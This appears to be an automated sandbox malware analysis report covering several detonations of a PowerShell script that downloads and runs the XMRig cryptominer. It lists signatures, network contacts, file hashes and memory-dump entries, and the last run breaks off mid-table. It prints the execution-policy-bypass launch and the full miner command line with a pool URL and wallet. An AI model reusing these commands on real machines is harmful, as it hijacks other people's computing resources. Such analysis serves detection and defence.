memory/5072-125-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-126-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-127-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-128-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-129-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-130-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-131-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-132-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-133-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-134-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-135-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-136-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-137-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-138-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-139-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-140-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-141-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-142-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-143-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-144-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-145-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-146-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-147-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-148-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-149-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-150-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-151-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-152-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-153-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-154-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-155-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
memory/5072-156-0x00007FF6E4ED0000-0x00007FF6E5B03000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:56
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1781s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1716 wrote to memory of 1328 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1716 wrote to memory of 1328 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/1716-4-0x00007FFE1D623000-0x00007FFE1D624000-memory.dmp
memory/1716-5-0x0000021EC42A0000-0x0000021EC42C2000-memory.dmp
memory/1716-9-0x00007FFE1D620000-0x00007FFE1E00C000-memory.dmp
memory/1716-8-0x0000021EC4560000-0x0000021EC45D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mcdngcvi.y2p.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1716-18-0x00007FFE1D620000-0x00007FFE1E00C000-memory.dmp
memory/1716-25-0x00007FFE1D620000-0x00007FFE1E00C000-memory.dmp
memory/1716-48-0x0000021EC46E0000-0x0000021EC46F2000-memory.dmp
memory/1716-61-0x0000021EC4540000-0x0000021EC454A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1328-90-0x0000027F7FE10000-0x0000027F7FE30000-memory.dmp
memory/1328-91-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-92-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1716-93-0x00007FFE1D623000-0x00007FFE1D624000-memory.dmp
memory/1716-94-0x00007FFE1D620000-0x00007FFE1E00C000-memory.dmp
memory/1716-95-0x00007FFE1D620000-0x00007FFE1E00C000-memory.dmp
memory/1328-96-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-97-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-98-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-99-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-100-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-101-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-102-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-103-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-104-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-105-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-106-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-107-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-108-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-109-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-110-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-111-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-112-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-113-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-114-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-115-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-116-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-117-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-118-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-119-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-120-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-121-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-122-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-123-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-124-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-125-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-126-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-127-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-128-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-129-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-130-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-131-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-132-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-133-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-134-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-135-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-136-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-137-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-138-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-139-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-140-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-141-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-142-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-143-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-144-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-145-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-146-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-147-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-148-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-149-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-150-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-151-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-152-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-153-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-154-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-155-0x00007FF771800000-0x00007FF772433000-memory.dmp
memory/1328-156-0x00007FF771800000-0x00007FF772433000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:27
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1768s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 860 wrote to memory of 4196 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 860 wrote to memory of 4196 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 138.91.171.81:80 | tcp | |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
memory/860-2-0x00007FF8C3953000-0x00007FF8C3954000-memory.dmp
memory/860-5-0x00000267A2360000-0x00000267A2382000-memory.dmp
memory/860-6-0x00007FF8C3950000-0x00007FF8C433C000-memory.dmp
memory/860-9-0x00007FF8C3950000-0x00007FF8C433C000-memory.dmp
memory/860-10-0x00000267A2510000-0x00000267A2586000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ueq0whlr.ebd.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/860-25-0x00007FF8C3950000-0x00007FF8C433C000-memory.dmp
memory/860-48-0x00000267A2590000-0x00000267A25A2000-memory.dmp
memory/860-61-0x00000267A24F0000-0x00000267A24FA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4196-90-0x0000017665700000-0x0000017665720000-memory.dmp
memory/4196-91-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/860-92-0x00007FF8C3953000-0x00007FF8C3954000-memory.dmp
memory/4196-93-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/860-94-0x00007FF8C3950000-0x00007FF8C433C000-memory.dmp
memory/4196-95-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-96-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-97-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-98-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-99-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-100-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-101-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-102-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-103-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-104-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-105-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-106-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-107-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-108-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-109-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-110-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-111-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-112-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-113-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-114-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-115-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-116-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-117-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-118-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-119-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-120-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-121-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-122-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-123-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-124-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-125-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-126-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-127-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-128-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-129-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-130-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-131-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-132-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-133-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-134-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-135-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-136-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-137-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-138-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-139-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-140-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-141-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-142-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-143-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-144-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-145-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-146-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-147-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-148-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-149-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-150-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-151-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-152-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-153-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-154-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
memory/4196-155-0x00007FF77F6E0000-0x00007FF780313000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:34
Platform
win11-20240426-en
Max time kernel
1791s
Max time network
1776s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
